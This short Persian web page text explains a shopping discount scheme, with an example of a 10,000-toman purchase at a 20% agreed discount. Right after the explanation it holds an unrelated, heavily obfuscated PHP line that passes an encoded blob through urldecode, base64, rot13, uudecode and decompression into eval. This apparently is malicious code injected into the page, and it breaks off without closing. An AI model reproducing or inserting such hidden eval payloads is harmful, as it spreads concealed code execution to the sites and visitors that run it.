چگونه کار می کند؟

فرض نمایید مصرف کننده ای در مرکز خریدی مراجعه نموده و کالایی را با مبلغ ۱۰ هزار تومان خریداری می نماید.

همچنین فرض نمایید که میزان درصد تخفیفی در مورد توافق شرکت با مرکز خرید مورد نظر ۲۰ درصد می باشد.

با انجام این خرید از سوی مصرف کننده مبلغ کسر شده ۸ هزار تومان می باشد .

eval(gzuncompress(gzinflate(convert_uudecode(str_rot13(base64_decode(urldecode("WmA2JGBUQl1LVCRaLUZZTjc0Kz8xM1xRWVlILkpMQSgkYDBQKTY5MTo2KVY5UiFXP1RMPjxXVyIxUVJTNApaUkxPO1dXJDAnXl9TTT4sOidNXkBXOiJUVSpNPzYlRTw2UipZN0hNMFFMVztUTT03USUmQFhTUi1QQFMpCiw%2BPDdSVzQ1MGBDIUdTMkNLCmAK"